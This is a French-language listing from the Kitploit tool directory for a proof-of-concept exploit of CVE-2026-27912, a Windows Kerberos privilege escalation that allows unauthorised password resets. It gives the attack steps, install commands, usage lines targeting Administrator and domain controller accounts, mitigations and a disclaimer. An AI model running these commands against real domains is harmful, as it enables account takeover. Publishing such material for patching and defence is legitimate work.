Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Kerberos-CVE-2026-27912 — PoC pour CVE-2026-27912 - Élévation de privilèges Windows Kerberos (ResetNightmare). Réinitialisation non autorisée du mot de passe via une faille Kerberos. Pour la recherche en sécurité uniquement. | Kitploit
Outils/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
Authentification et AutorisationEscalade de PrivilègesAttaques de Mots de PasseExploitationTests d'Intrusion
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

PoC pour CVE-2026-27912 - Élévation de privilèges Windows Kerberos (ResetNightmare). Réinitialisation non autorisée du mot de passe via une faille Kerberos. Pour la recherche en sécurité uniquement.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
210il y a 26 joursPas encore vérifié

Kerberos-CVE-2026-27912

CVE-2026-27912 - Vulnérabilité d'élévation de privilèges dans Kerberos Windows

ResetNightmare - Réinitialisation de mot de passe non autorisée via une faille du protocole de changement de mot de passe de Kerberos.


📋 Détails

ChampValeur
CVECVE-2026-27912
TitreVulnérabilité d'élévation de privilèges dans Kerberos Windows
CVSS8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: Autorisation inappropriée
Publié14 avril 2026
Corrigéavril 2026

🔍 Déroulement de l'attaque

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 Prérequis

  • Windows avec PowerShell
  • Module ActiveDirectory (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (téléchargement depuis GhostPack/Rubeus)
  • Accès réseau au contrôleur de domaine

🚀 Installation

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 Utilisation

Attaque de base

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

Compte d'ordinateur cible

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

Créer un nouveau compte

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

Mode verbeux

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 Arguments


🛡️ Atténuation

  1. Appliquez le correctif officiel de la mise à jour de sécurité Microsoft
  2. Segmentez le réseau pour limiter l'accès réseau adjacent
  3. Appliquez le moindre privilège - restreignez les autorisations d'écriture UPN
  4. Surveillez les modifications UPN suspectes et les réinitialisations de mot de passe

⚠️ Avertissement

Réservé aux tests de sécurité autorisés et à la recherche pédagogique.

L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce logiciel.


📚 Références

  • NVD: CVE-2026-27912
  • Guide des mises à jour de sécurité Microsoft

👨‍💻 Auteur

n0vax1337 / Chercheur en sécurité


📄 Licence

Licence MIT - voir LICENSE


Dernière mise à jour : 2026

Télécharger l’outil
FlagDescriptionDéfaut
-t / --targetNom du compte ciblerequis
-p / --new-passwordNouveau mot de passe pour la ciblerequis
-u / --upn-userCompte sur lequel définir un faux UPNrequis
-up / --upn-passwordMot de passe du compte UPNrequis
-c / --computerUPNUser est un compte d'ordinateurdrapeau
-r / --rubeus-pathChemin vers Rubeus.exeRubeus.exe
-e / --encryptionType de chiffrement pris en chargeAES256
-path / --create-pathChemin OU pour créer le nouveau compte""
-d / --dcNom du contrôleur de domainedétection automatique
-v / --verboseSortie verbeusedrapeau